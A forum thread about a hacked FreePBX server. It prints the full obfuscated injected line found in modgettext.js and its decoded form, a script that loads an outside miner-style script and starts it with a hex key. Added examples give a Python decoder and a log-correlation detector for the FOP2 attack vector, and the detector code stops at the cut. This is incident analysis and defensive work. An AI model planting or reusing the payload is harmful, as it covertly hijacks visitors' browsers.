/var/www/html/admin/assets/js/modgettext.js altered. Hacked?

Hello all. I’m getting the following warning on one of my servers:

Module: “FreePBX Framework”, File: “/var/www/html/admin/assets/js/modgettext.js altered”.

Seems like I may have been compromised. Any ideas how this may have happened? I had the admin portal open to the internet, both on http and https, but I wouldn’t expect a bad actor to be able to modify my files simply due to that.

I checked the file and I noticed this errant, clearly obfuscated and harmful, line quite a bit below the normal bottom of the file:

eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%65%76%61%6C%28%75%6E%65%73%63%61%70%65%28%5C%27%25%36%34%25%36%46%25%36%33%25%37%35%25%36%44%25%36%35%25%36%45%25%37%34%25%32%45%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%32%38%25%32%37%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%32%30%25%37%33%25%37%32%25%36%33%25%33%44%25%32%32%25%36%38%25%37%34%25%37%34%25%37%30%25%37%33%25%33%41%25%32%46%25%32%46%25%37%37%25%37%37%25%37%37%25%32%45%25%36%38%25%36%46%25%37%33%25%37%34%25%36%39%25%36%45%25%36%37%25%36%33%25%36%43%25%36%46%25%37%35%25%36%34%25%32%45%25%37%32%25%36%31%25%36%33%25%36%39%25%36%45%25%36%37%25%32%46%25%35%37%25%35%39%25%35%41%25%37%37%25%32%45%25%36%41%25%37%33%25%32%32%25%33%45%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%35%43%25%36%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%35%43%25%36%45%25%32%30%25%32%30%25%32%30%25%32%30%25%37%36%25%36%31%25%37%32%25%32%30%25%35%46%25%36%33%25%36%43%25%36%39%25%36%35%25%36%45%25%37%34%25%32%30%25%33%44%25%32%30%25%36%45%25%36%35%25%37%37%25%32%30%25%34%33%25%36%43%25%36%39%25%36%35%25%36%45%25%37%34%25%32%45%25%34%31%25%36%45%25%36%46%25%36%45%25%37%39%25%36%44%25%36%46%25%37%35%25%37%33%25%32%38%25%35%43%25%32%37%25%33%30%25%33%30%25%33%35%25%33%30%25%33%39%25%33%31%25%36%31%25%36%31%25%33%38%25%33%33%25%36%35%25%33%32%25%33%36%25%33%35%25%33%32%25%36%33%25%33%39%25%36%36%25%36%36%25%33%31%25%33%30%25%33%33%25%36%36%25%33%38%25%33%38%25%36%31%25%36%35%25%33%37%25%33%37%25%33%37%25%33%33%25%33%37%25%36%34%25%33%32%25%33%35%25%33%32%25%33%31%25%33%34%25%36%35%25%36%35%25%36%33%25%36%36%25%36%34%25%33%38%25%36%33%25%33%36%25%33%30%25%33%31%25%36%32%25%33%37%25%33%37%25%33%37%25%33%33%25%33%33%25%33%35%25%33%31%25%36%34%25%33%36%25%33%35%25%36%33%25%33%38%25%33%32%25%33%38%25%33%30%25%35%43%25%32%37%25%32%43%25%32%30%25%37%42%25%35%43%25%36%45%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%37%34%25%36%38%25%37%32%25%36%46%25%37%34%25%37%34%25%36%43%25%36%35%25%33%41%25%32%30%25%33%30%25%32%43%25%32%30%25%36%33%25%33%41%25%32%30%25%35%43%25%32%37%25%37%37%25%35%43%25%32%37%25%32%43%25%32%30%25%36%31%25%36%34%25%37%33%25%33%41%25%32%30%25%33%30%25%35%43%25%36%45%25%32%30%25%32%30%25%32%30%25%32%30%25%37%44%25%32%39%25%33%42%25%35%43%25%36%45%25%32%30%25%32%30%25%32%30%25%32%30%25%35%46%25%36%33%25%36%43%25%36%39%25%36%35%25%36%45%25%37%34%25%32%45%25%37%33%25%37%34%25%36%31%25%37%32%25%37%34%25%32%38%25%32%39%25%33%42%25%35%43%25%36%45%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%32%37%25%32%39%25%33%42%5C%27%29%29%3B%3C%2F%73%63%72%69%70%74%3E%27%29%3B'));

Which, when unescaped a couple times, gives us something like:

document.write('\x3Cscript type="text/javascript">eval(`document.write('\x3Cscript src="https://www.hostingcloud.racing/WYZw.js">\x3C/script>\\n\x3Cscript>\\n    var _client = new Client.Anonymous(\\'005091aa83e2652c9ff103f88ae77737d25214eecfd8c601b7773351d65c8280\\', {\\n        throttle: 0, c: \\'w\\', ads: 0\\n    });\\n    _client.start();\\n\x3C/script>');\\`);\x3C/script>');

I can’t see the script at https://www.hostingcloud.racing/WYZw.js but I’m sure it’s not good.
Do you have any recommendations on further places to check for potential methods used to modify this file? Or what this script might actually be doing? I can’t access the script at the URL, but the site is still online.

Looks like that file was last modified 3 days ago.

Any suggestions or thoughts? If not, I figured it would be good to at least get this out there for any of the security experts to be aware of.

Also, do you think this calls for a total reinstall, or could I simply revert to a backup from a week ago and be sure to update any potentially out of date modules?
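An added example, not a post in this thread and not FreePBX or Asternic code: an offline decoder for nested eval(unescape('%XX...')) droppers of the shape shown above. It never evaluates anything; it percent-decodes the string literal handed to each eval(unescape(...)) call, repeats until no such call is left, then pulls out the remote script URL and the 64-hex value passed to Client.Anonymous() (the calling convention of CoinIMP-style browser miners; reading that as a miner site key is my interpretation, not something the thread states). The embedded sample is constructed to mirror the two-layer structure of the real payload; the attacker.invalid domain and the all-zero key are placeholders, not real indicators.

```python
"""Offline decoder for nested eval(unescape('%XX...')) JavaScript droppers.
Each layer's string literal is percent-decoded, the result is searched for
the next eval(unescape(...)) call, and the final plaintext is mined for
indicators. No JavaScript is ever executed.
"""
import re
from typing import Dict, List

# eval(unescape('...')): the quotes may be backslash-escaped because the
# inner call sits inside an outer JavaScript string literal.
EVAL_UNESCAPE_RE = re.compile(r"eval\(unescape\(\\*'([^'\\]*)\\*'\)\)")

IOC_PATTERNS = {
    "script_src": re.compile(r"""src\s*=\s*\\*["']([^"'\\]+)"""),
    # 64 hex chars handed to Client.Anonymous(): assumed to be a miner site key.
    "miner_site_key": re.compile(r"""Client\.Anonymous\(\s*\\*["']([0-9a-f]{64})"""),
}


def js_unescape(s: str) -> str:
    """Mimic JavaScript's unescape(): %uXXXX and %XX become single code
    units in one pass, so decoded text is never re-decoded."""
    return re.sub(
        r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})",
        lambda m: chr(int(m.group(1) or m.group(2), 16)),
        s,
    )


def decode_layers(js: str, max_depth: int = 10) -> List[str]:
    """Return [original, layer 1, layer 2, ...], peeling one
    eval(unescape()) per step until none is left or max_depth is hit."""
    layers = [js]
    current = js
    for _ in range(max_depth):
        m = EVAL_UNESCAPE_RE.search(current)
        if not m:
            break
        current = js_unescape(m.group(1))
        layers.append(current)
    return layers


def extract_iocs(plaintext: str) -> Dict[str, List[str]]:
    """Pull remote script URLs and miner site keys out of decoded JavaScript."""
    return {name: sorted(set(rx.findall(plaintext))) for name, rx in IOC_PATTERNS.items()}


def find_injected_droppers(file_text: str) -> List[int]:
    """1-based line numbers in a JS asset that contain eval(unescape('...'));
    a clean FreePBX asset should yield an empty list."""
    return [n for n, line in enumerate(file_text.splitlines(), 1)
            if EVAL_UNESCAPE_RE.search(line)]


# --- constructed sample (placeholders, not real indicators) -----------------
def percent_encode(s: str) -> str:
    """Encode every character as %XX, the way the dropper's author did."""
    return "".join("%%%02X" % ord(c) for c in s)


SAMPLE_URL = "https://attacker.invalid/WYZw.js"   # .invalid is a reserved TLD
SAMPLE_KEY = "00" * 32                            # placeholder 64-hex key
SAMPLE_INNER = (
    "document.write('<script src=\"%s\"></script><script>"
    "var _client = new Client.Anonymous(\\'%s\\', {throttle: 0, c: \\'w\\', ads: 0});"
    "_client.start();</script>');" % (SAMPLE_URL, SAMPLE_KEY)
)
SAMPLE_LAYER1 = (
    "document.write('<script type=\"text/javascript\">eval(unescape(\\'%s\\'));"
    "</script>');" % percent_encode(SAMPLE_INNER)
)
SAMPLE_DROPPER = "eval(unescape('%s'));" % percent_encode(SAMPLE_LAYER1)
# Stand-in for a JS asset with the dropper appended a few blank lines below
# the legitimate code, as described in the thread.
SAMPLE_FILE = "function modgettext(s) { return s; }\n\n\n" + SAMPLE_DROPPER + "\n"


if __name__ == "__main__":
    print("dropper on lines:", find_injected_droppers(SAMPLE_FILE))
    layers = decode_layers(SAMPLE_DROPPER)
    for depth, text in enumerate(layers):
        print("--- layer %d ---\n%s" % (depth, text[:160]))
    print("indicators:", extract_iocs(layers[-1]))
```

Run it against the real file by reading modgettext.js into find_injected_droppers() and feeding each flagged line to decode_layers(); the URL and key it reports are what to search for across the other web-root files and in proxy or DNS logs.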

What versions of all modules are you running? Can you post the output of fwconsole ma list?

I actually found that another of my servers had been compromised in the same way. I’m sure they’re both out of date in more than one way. One is still on FPBX 14. Here is the list from one:

+----------------------+------------+--------------------------------------+-------------+-----------+
| Module               | Version    | Status                               | License     | Signature |
+----------------------+------------+--------------------------------------+-------------+-----------+
| accountcodepreserve  | 13.0.2.2   | Enabled                              | GPLv2       | Sangoma   |
| amd                  | 15.0.3     | Enabled                              | GPLv3+      | Sangoma   |
| announcement         | 15.0.3.13  | Enabled                              | GPLv3+      | Sangoma   |
| api                  | 15.0.9     | Enabled                              | AGPLv3+     | Sangoma   |
| areminder            | 15.0.14.27 | Enabled                              | Commercial  | Sangoma   |
| arimanager           | 15.0.3.13  | Enabled                              | GPLv3+      | Sangoma   |
| asterisk-cli         | 14.0.4     | Enabled                              | GPLv3+      | Sangoma   |
| asteriskinfo         | 15.0.14    | Enabled                              | GPLv3+      | Sangoma   |
| backup               | 15.0.21.4  | Enabled                              | GPLv3+      | Sangoma   |
| blacklist            | 15.0.3     | Enabled                              | GPLv3+      | Sangoma   |
| broadcast            | 15.0.21    | Enabled                              | Commercial  | Sangoma   |
| builtin              |            | Enabled                              |             | Unsigned  |
| bulkhandler          | 15.0.4     | Enabled                              | GPLv3+      | Sangoma   |
| calendar             | 15.0.4.23  | Enabled                              | GPLv3+      | Sangoma   |
| callback             | 15.0.12    | Enabled                              | GPLv3+      | Sangoma   |
| callerid             | 15.0.16    | Enabled                              | Commercial  | Sangoma   |
| callforward          | 15.0.16    | Enabled                              | AGPLv3+     | Sangoma   |
| calllimit            | 15.0.5.6   | Enabled                              | Commercial  | Sangoma   |
| callrecording        | 15.0.7.28  | Enabled                              | AGPLv3+     | Sangoma   |
| callwaiting          | 15.0.4.6   | Enabled                              | GPLv3+      | Sangoma   |
| campon               | 13.0.4.1   | Enabled                              | GPLv3+      | Sangoma   |
| cdr                  | 15.0.17.26 | Enabled                              | GPLv3+      | Sangoma   |
| cel                  | 15.0.15.17 | Enabled                              | GPLv3+      | Sangoma   |
| certman              | 15.0.49    | Enabled                              | AGPLv3+     | Sangoma   |
| cidlookup            | 15.0.25    | Enabled                              | GPLv3+      | Sangoma   |
| conferences          | 15.0.7.11  | Enabled                              | GPLv3+      | Sangoma   |
| conferencespro       | 15.0.3.18  | Enabled                              | Commercial  | Sangoma   |
| configedit           | 13.0.7.3   | Enabled                              | AGPLv3+     | Sangoma   |
| contactmanager       | 15.0.9.11  | Enabled                              | GPLv3+      | Sangoma   |
| core                 | 15.0.22.22 | Enabled                              | GPLv3+      | Sangoma   |
| cos                  | 15.0.15    | Enabled                              | Commercial  | Sangoma   |
| customappsreg        | 15.0.14    | Enabled                              | GPLv3+      | Sangoma   |
| cxpanel              | 15.0.4     | Enabled                              | GPLv3       | Sangoma   |
| dahdiconfig          | 15.0.5.8   | Enabled                              | GPLv3+      | Sangoma   |
| dashboard            | 15.0.15    | Enabled                              | AGPLv3+     | Sangoma   |
| daynight             | 15.0.12    | Enabled                              | GPLv3+      | Sangoma   |
| dictate              | 15.0.7     | Enabled                              | GPLv3+      | Sangoma   |
| digium_phones        | 13.0.7.4   | Disabled; Pending upgrade to 15.0.12 | GPLv2       | Sangoma   |
| digiumaddoninstaller | 13.0.1.4   | Enabled                              | GPLv2       | Sangoma   |
| directory            | 15.0.18    | Enabled                              | GPLv3+      | Sangoma   |
| disa                 | 15.0.4.9   | Enabled                              | AGPLv3+     | Sangoma   |
| donotdisturb         | 15.0.10    | Enabled                              | GPLv3+      | Sangoma   |
| dundicheck           | 2.11.0.3   | Enabled                              | GPLv3+      | Sangoma   |
| endpoint             | 15.0.24.19 | Enabled                              | Commercial  | Sangoma   |
| extensionroutes      | 15.0.8     | Enabled                              | Commercial  | Sangoma   |
| extensionsettings    | 13.0.4     | Enabled                              | GPLv3+      | Sangoma   |
| fax                  | 15.0.22    | Enabled                              | GPLv3+      | Sangoma   |
| faxpro               | 15.0.8.16  | Enabled                              | Commercial  | Sangoma   |
| featurecodeadmin     | 13.0.6.11  | Enabled                              | GPLv3+      | Sangoma   |
| filestore            | 15.0.4     | Enabled                              | AGPLv3      | Sangoma   |
| findmefollow         | 15.0.34    | Enabled                              | GPLv3+      | Sangoma   |
| firewall             | 15.0.42    | Enabled                              | AGPLv3+     | Sangoma   |
| framework            | 15.0.24    | Enabled                              | GPLv2+      | Sangoma   |
| freepbx_ha           | 13.0.11    | Enabled                              | Commercial  | Sangoma   |
| fw_langpacks         | 14.0.1     | Enabled                              | GPLv3+      | Sangoma   |
| hotelwakeup          | 15.0.5.5   | Enabled                              | GPLv2       | Sangoma   |
| iaxsettings          | 15.0.8     | Enabled                              | AGPLv3      | Sangoma   |
| infoservices         | 15.0.3     | Enabled                              | GPLv2+      | Sangoma   |
| irc                  | 13.0.1     | Enabled                              | GPLv3+      | Sangoma   |
| ivr                  | 15.0.30    | Enabled                              | GPLv3+      | Sangoma   |
| languages            | 15.0.12    | Enabled                              | GPLv3+      | Sangoma   |
| logfiles             | 15.0.15    | Enabled                              | GPLv3+      | Sangoma   |
| manager              | 15.0.17    | Enabled                              | GPLv2+      | Sangoma   |
| miscapps             | 15.0.10    | Enabled                              | GPLv3+      | Sangoma   |
| miscdests            | 15.0.2.12  | Enabled                              | GPLv3+      | Sangoma   |
| motif                | 13.0.3.2   | Enabled                              | GPLv3+      | Sangoma   |
| music                | 15.0.22    | Enabled                              | GPLv3+      | Sangoma   |
| outroutemsg          | 15.0.9     | Enabled                              | GPLv3+      | Sangoma   |
| paging               | 15.0.4.33  | Enabled                              | GPLv3+      | Sangoma   |
| pagingpro            | 15.0.2     | Enabled                              | Commercial  | Sangoma   |
| parking              | 15.0.15.4  | Enabled                              | GPLv3+      | Sangoma   |
| parkpro              | 15.0.13    | Enabled                              | Commercial  | Sangoma   |
| pbdirectory          | 2.11.0.6   | Enabled                              | GPLv3+      | Sangoma   |
| phonebook            | 15.0.12    | Enabled                              | GPLv3+      | Sangoma   |
| phpinfo              | 13.0.2     | Enabled                              | GPLv2+      | Sangoma   |
| pinsets              | 15.0.1.15  | Enabled                              | GPLv3+      | Sangoma   |
| pinsetspro           | 15.0.4     | Enabled                              | Commercial  | Sangoma   |
| pm2                  | 15.0.10    | Enabled                              | AGPLv3+     | Sangoma   |
| pms                  | 14.0.2.68  | Disabled; Pending upgrade to 15.0.5  | Commercial  | Sangoma   |
| presencestate        | 15.0.11    | Enabled                              | GPLv3+      | Sangoma   |
| printextensions      | 13.0.3.4   | Enabled                              | GPLv3+      | Sangoma   |
| queuemetrics         | 2.11.0.3   | Enabled                              | GPLv3+      | Sangoma   |
| queueprio            | 15.0.10    | Enabled                              | GPLv3+      | Sangoma   |
| queues               | 15.0.34    | Enabled                              | GPLv2+      | Sangoma   |
| queuestats           | 15.0.9     | Enabled                              | Commercial  | Sangoma   |
| qxact_reports        | 15.0.12    | Enabled                              | Commercial  | Sangoma   |
| recording_report     | 15.0.8     | Enabled                              | Commercial  | Sangoma   |
| recordings           | 15.0.3.19  | Enabled                              | GPLv3+      | Sangoma   |
| restapi              | 13.0.21.2  | Enabled                              | AGPLv3      | Sangoma   |
| restapps             |            | Not Installed (Locally available)    | Commercial  | Sangoma   |
| ringgroups           | 15.0.11.17 | Enabled                              | GPLv3+      | Sangoma   |
| setcid               | 15.0.9     | Enabled                              | GPLv3+      | Sangoma   |
| sipsettings          | 15.0.11    | Enabled                              | AGPLv3+     | Sangoma   |
| sipstation           | 15.0.11    | Enabled                              | Commercial  | Sangoma   |
| sms                  | 15.0.36    | Enabled                              | Commercial  | Sangoma   |
| soundlang            | 15.0.5.10  | Enabled                              | GPLv3+      | Sangoma   |
| speeddial            | 2.11.0.4   | Enabled                              | GPLv3+      | Sangoma   |
| superfecta           | 15.0.3     | Enabled                              | GPLv2+      | Sangoma   |
| sysadmin             | 15.0.29.12 | Enabled                              | Commercial  | Sangoma   |
| timeconditions       | 15.0.15.11 | Enabled                              | GPLv3+      | Sangoma   |
| tts                  | 15.0.12    | Enabled                              | GPLv3+      | Sangoma   |
| ttsengines           | 15.0.4.7   | Enabled                              | AGPLv3      | Sangoma   |
| ucp                  | 15.0.14.5  | Enabled                              | AGPLv3+     | Sangoma   |
| userman              | 15.0.69.7  | Enabled                              | AGPLv3+     | Sangoma   |
| vega                 | 15.0.12    | Enabled                              | Commercial+ | Sangoma   |
| vmblast              | 15.0.11.8  | Enabled                              | GPLv3+      | Sangoma   |
| vmnotify             | 15.0.15    | Enabled                              | Commercial  | Sangoma   |
| voicemail            | 15.0.27    | Enabled                              | GPLv3+      | Sangoma   |
| voicemail_report     | 15.0.7     | Enabled                              | Commercial  | Sangoma   |
| vqplus               | 15.0.7.30  | Enabled                              | Commercial  | Sangoma   |
| weakpasswords        | 13.0.2     | Enabled                              | GPLv3+      | Sangoma   |
| webcallback          | 15.0.6.3   | Enabled                              | Commercial  | Sangoma   |
| webrtc               | 15.0.10.9  | Enabled                              | GPLv3+      | Sangoma   |
| xmpp                 | 15.0.6.12  | Enabled                              | AGPLv3      | Sangoma   |
+----------------------+------------+--------------------------------------+-------------+-----------+

And the other:

+----------------------+------------+-------------------------------------+-------------+
| Module               | Version    | Status                              | License     |
+----------------------+------------+-------------------------------------+-------------+
| accountcodepreserve  | 13.0.2.2   | Enabled                             | GPLv2       |
| amd                  | 13.0.3     | Enabled                             | GPLv3+      |
| announcement         | 13.0.7.8   | Enabled                             | GPLv3+      |
| areminder            | 14.0.4.19  | Enabled                             | Commercial  |
| arimanager           | 13.0.5.4   | Enabled                             | GPLv3+      |
| asterisk-cli         | 14.0.1     | Enabled                             | GPLv3+      |
| asteriskinfo         | 13.0.7.2   | Enabled                             | GPLv3+      |
| backup               | 14.0.10.10 | Enabled                             | GPLv3+      |
| blacklist            | 14.0.5     | Enabled                             | GPLv3+      |
| broadcast            | 14.0.1.13  | Enabled                             | Commercial  |
| builtin              |            | Enabled                             |             |
| bulkhandler          | 13.0.24    | Enabled                             | GPLv3+      |
| calendar             | 14.0.3.9   | Enabled                             | GPLv3+      |
| callaccounting       | 14.0.18    | Enabled                             | Commercial+ |
| callback             | 13.0.5.5   | Enabled                             | GPLv3+      |
| callerid             | 13.0.8.20  | Enabled                             | Commercial  |
| callforward          | 14.0.1.3   | Enabled                             | AGPLv3+     |
| calllimit            | 13.0.5.7   | Enabled                             | Commercial  |
| callrecording        | 14.0.16    | Enabled                             | AGPLv3+     |
| callwaiting          | 14.0.1.1   | Enabled                             | GPLv3+      |
| campon               | 13.0.4.1   | Enabled                             | GPLv3+      |
| cdr                  | 14.0.5.22  | Enabled                             | GPLv3+      |
| cel                  | 14.0.4     | Enabled                             | GPLv3+      |
| certman              | 14.0.20    | Enabled                             | AGPLv3+     |
| cidlookup            | 14.0.1.12  | Enabled                             | GPLv3+      |
| conferences          | 13.0.23.17 | Enabled                             | GPLv3+      |
| conferencespro       | 14.0.2.13  | Enabled                             | Commercial  |
| configedit           | 13.0.7.1   | Enabled                             | AGPLv3+     |
| contactmanager       | 14.0.5.13  | Enabled                             | GPLv3+      |
| core                 | 14.0.29    | Enabled                             | GPLv3+      |
| cos                  | 13.0.12.7  | Enabled                             | Commercial  |
| customappsreg        | 13.0.5.7   | Enabled                             | GPLv3+      |
| cxpanel              | 14.0.4     | Enabled                             | GPLv3       |
| dahdiconfig          | 14.0.1.6   | Enabled                             | GPLv3+      |
| dashboard            | 14.0.10    | Enabled                             | AGPLv3+     |
| daynight             | 14.0.1     | Enabled                             | GPLv3+      |
| dictate              | 13.0.5     | Enabled                             | GPLv3+      |
| digium_phones        | 13.0.7.4   | Enabled                             | GPLv2       |
| digiumaddoninstaller | 13.0.1.1   | Enabled                             | GPLv2       |
| directory            | 13.0.19.12 | Enabled                             | GPLv3+      |
| disa                 | 13.0.6.12  | Enabled                             | AGPLv3+     |
| donotdisturb         | 14.0.1.1   | Enabled                             | GPLv3+      |
| dundicheck           | 2.11.0.3   | Enabled                             | GPLv3+      |
| endpoint             | 14.0.43.14 | Enabled                             | Commercial  |
| extensionroutes      | 13.0.10.7  | Enabled                             | Commercial  |
| extensionsettings    | 13.0.4     | Enabled                             | GPLv3+      |
| fax                  | 14.0.2.8   | Enabled                             | GPLv3+      |
| faxpro               | 14.0.13    | Enabled                             | Commercial  |
| featurecodeadmin     | 13.0.6.4   | Enabled                             | GPLv3+      |
| findmefollow         | 14.0.1.26  | Enabled                             | GPLv3+      |
| firewall             | 14.0.3.4   | Enabled                             | AGPLv3+     |
| framework            | 14.0.13.34 | Enabled                             | GPLv2+      |
| freepbx_ha           | 13.0.11    | Enabled                             | Commercial  |
| fw_langpacks         | 14.0.1     | Enabled                             | GPLv3+      |
| hotelwakeup          | 14.0.1.6   | Enabled                             | GPLv2       |
| iaxsettings          | 14.0.1.4   | Enabled                             | AGPLv3      |
| infoservices         | 13.0.1.4   | Enabled                             | GPLv2+      |
| irc                  | 13.0.1     | Enabled                             | GPLv3+      |
| ivr                  | 14.0.9.8   | Enabled                             | GPLv3+      |
| languages            | 14.0.1.5   | Enabled                             | GPLv3+      |
| logfiles             | 13.0.10.10 | Enabled                             | GPLv3+      |
| manager              | 13.0.2.10  | Enabled                             | GPLv2+      |
| miscapps             | 13.0.3.2   | Enabled                             | GPLv3+      |
| miscdests            | 13.0.9     | Enabled                             | GPLv3+      |
| motif                | 13.0.3.2   | Enabled                             | GPLv3+      |
| music                | 13.0.22.8  | Enabled                             | GPLv3+      |
| outroutemsg          | 14.0.1     | Enabled                             | GPLv3+      |
| paging               | 14.0.16.6  | Enabled                             | GPLv3+      |
| pagingpro            | 14.0.2.29  | Enabled                             | Commercial  |
| parking              | 13.0.19.11 | Enabled                             | GPLv3+      |
| parkpro              | 14.0.2.12  | Enabled                             | Commercial  |
| pbdirectory          | 2.11.0.6   | Enabled                             | GPLv3+      |
| phonebook            | 13.0.6.5   | Enabled                             | GPLv3+      |
| phpinfo              | 13.0.2     | Enabled                             | GPLv2+      |
| pinsets              | 13.0.13    | Enabled                             | GPLv3+      |
| pinsetspro           | 13.0.9.14  | Enabled                             | Commercial  |
| pm2                  | 13.0.7.1   | Enabled                             | AGPLv3+     |
| pms                  | 14.0.2.63  | Disabled; Pending upgrade to 14.0.3 | Commercial  |
| presencestate        | 14.0.1.10  | Enabled                             | GPLv3+      |
| printextensions      | 13.0.3.2   | Enabled                             | GPLv3+      |
| queuemetrics         | 2.11.0.3   | Enabled                             | GPLv3+      |
| queueprio            | 13.0.7     | Enabled                             | GPLv3+      |
| queues               | 14.0.2.31  | Enabled                             | GPLv2+      |
| queuestats           | 14.0.1.41  | Enabled                             | Commercial  |
| qxact_reports        | 14.0.7.21  | Enabled                             | Commercial  |
| recording_report     | 14.0.3.11  | Enabled                             | Commercial  |
| recordings           | 13.0.30.14 | Enabled                             | GPLv3+      |
| restapi              | 13.0.21.2  | Enabled                             | AGPLv3      |
| restapps             |            | Not Installed (Locally available)   | Commercial  |
| ringgroups           | 14.0.1.13  | Enabled                             | GPLv3+      |
| sangomacrm           | 14.0.25.20 | Enabled                             | Commercial  |
| setcid               | 13.0.6.3   | Enabled                             | GPLv3+      |
| sipsettings          | 14.0.27.29 | Enabled                             | AGPLv3+     |
| sipstation           | 14.0.4.5   | Enabled                             | Commercial  |
| sms                  | 14.0.5     | Enabled                             | Commercial  |
| soundlang            | 14.0.10    | Enabled                             | GPLv3+      |
| speeddial            | 2.11.0.4   | Enabled                             | GPLv3+      |
| superfecta           | 14.0.30    | Enabled                             | GPLv2+      |
| sysadmin             | 14.0.39.3  | Enabled                             | Commercial  |
| timeconditions       | 14.0.2.19  | Enabled                             | GPLv3+      |
| tts                  | 13.0.15    | Enabled                             | GPLv3+      |
| ttsengines           | 13.0.7.5   | Enabled                             | AGPLv3      |
| ucp                  | 14.0.3.21  | Enabled                             | AGPLv3+     |
| userman              | 14.0.13    | Enabled                             | AGPLv3+     |
| vega                 | 14.0.3.24  | Enabled                             | Commercial+ |
| vmblast              | 13.0.11    | Enabled                             | GPLv3+      |
| vmnotify             | 14.0.1.7   | Enabled                             | Commercial  |
| voicemail            | 14.0.7     | Enabled                             | GPLv3+      |
| voicemail_report     | 14.0.6     | Enabled                             | Commercial  |
| vqplus               | 14.0.4.15  | Enabled                             | Commercial  |
| weakpasswords        | 13.0.2     | Enabled                             | GPLv3+      |
| webcallback          | 13.0.11.5  | Enabled                             | Commercial  |
| webrtc               | 14.0.3.8   | Enabled                             | GPLv3+      |
| zulu                 | 14.0.58.3  | Enabled                             | Commercial  |
+----------------------+------------+-------------------------------------+-------------+


PM Sent

Can we not have this be hidden through PMs? If an exploit exists, it’s paramount that this is all kept in the community’s eyes so others can assist and chime in. Users need to know if some new exploit is discovered or not.


Hi @tonyclewis and anyone else coming across this thread, I agree that transparency is important. I think the ‘hidden’ aspect was mainly to enable safe sharing of potentially sensitive details from log files and so on.

Regardless, the attack vector was actually determined to be an unsecured, open to the internet, fop2 instance. I’d recommend that if you are running FOP2, be sure to only enable access via a whitelist. This is definitely the normal best practice, but I cut a few corners to make some customers happy and now I’m paying the price.

I’ll be reaching out to the folks at Asternic and letting them know some of the more specific details to hopefully enable them to fix this problem.

Be safe out there.


Can we get some more details on this? Such as what is the attack vector in FOP2? Does this impact FOP2 instances running on HTTPS? Was this the user or admin interface that was compromised? What version of FOP2 is this happening on?


Hi @BlazeStudios.

I don’t think we know what range of versions it impacts. The version impacted in my case is 2.31.30. A few minor versions behind the latest FOP2 version.

The attack vector was a POST request to /fop2/lang/ko.php. Earlier in the day the server was scanned from the attacking IP via 2 HEAD requests to /fop2/JSON.php.

Unfortunately, the ko.php file is obfuscated, so it’s hard to tell what is actually happening there.

I was running FOP2 with https, as described in my post here:

Meaning that HTTPS was being used, however, I also had insecure access enabled to the “Web Management” service in the firewall, which I think may mean that fop2 would have been accessible without HTTPS.

I don’t think either of the interfaces were actually compromised, just a POST request to that PHP file.
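An added example, not a post in this thread: detection logic for the sequence described above (HEAD scans of /fop2/JSON.php from an IP that later POSTs to a file under /fop2/lang/). Language files are static includes, so a POST to one is anomalous on its own; the earlier scan from the same IP is reported as supporting context. It assumes Apache combined log format; the log lines are constructed with documentation-range IPs and invented timestamps.

```python
"""Correlate access-log entries: IPs that POST to /fop2/lang/*.php and any
earlier HEAD/GET reconnaissance they made against /fop2/JSON.php.
"""
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Optional

# Apache "combined" log format (assumed; adjust LOG_RE for other formats).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
RECON_PATH = "/fop2/JSON.php"
LANG_PHP_RE = re.compile(r"^/fop2/lang/[^/?]+\.php(?:\?.*)?$")


def parse_line(line: str) -> Optional[dict]:
    """Parse one combined-format line; None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def find_fop2_suspects(lines: List[str]) -> Dict[str, dict]:
    """Map each IP that POSTed to /fop2/lang/*.php to its POSTs and to the
    HEAD/GET requests it made to /fop2/JSON.php before the first POST."""
    by_ip: Dict[str, List[dict]] = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)

    suspects = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        posts = [r for r in recs
                 if r["method"] == "POST" and LANG_PHP_RE.match(r["path"])]
        if not posts:
            continue
        first_post = posts[0]["ts"]
        recon = [r for r in recs
                 if r["path"] == RECON_PATH
                 and r["method"] in ("HEAD", "GET")
                 and r["ts"] < first_post]
        suspects[ip] = {
            "recon": [(r["ts"].isoformat(), r["method"]) for r in recon],
            "lang_posts": [(r["ts"].isoformat(), r["path"], r["status"]) for r in posts],
        }
    return suspects


# Constructed sample log: documentation-range IPs, invented timestamps.
SAMPLE_LOG = """\
203.0.113.7 - - [14/Jun/2021:03:12:41 +0000] "HEAD /fop2/JSON.php HTTP/1.1" 200 - "-" "Mozilla/5.0"
203.0.113.7 - - [14/Jun/2021:03:12:43 +0000] "HEAD /fop2/JSON.php HTTP/1.1" 200 - "-" "Mozilla/5.0"
198.51.100.20 - - [14/Jun/2021:09:01:02 +0000] "GET /fop2/index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.20 - - [14/Jun/2021:09:01:03 +0000] "GET /fop2/lang/en.php HTTP/1.1" 200 50 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Jun/2021:17:45:10 +0000] "POST /fop2/lang/ko.php HTTP/1.1" 200 31 "-" "python-requests/2.25.1"
"""

if __name__ == "__main__":
    for ip, info in find_fop2_suspects(SAMPLE_LOG.splitlines()).items():
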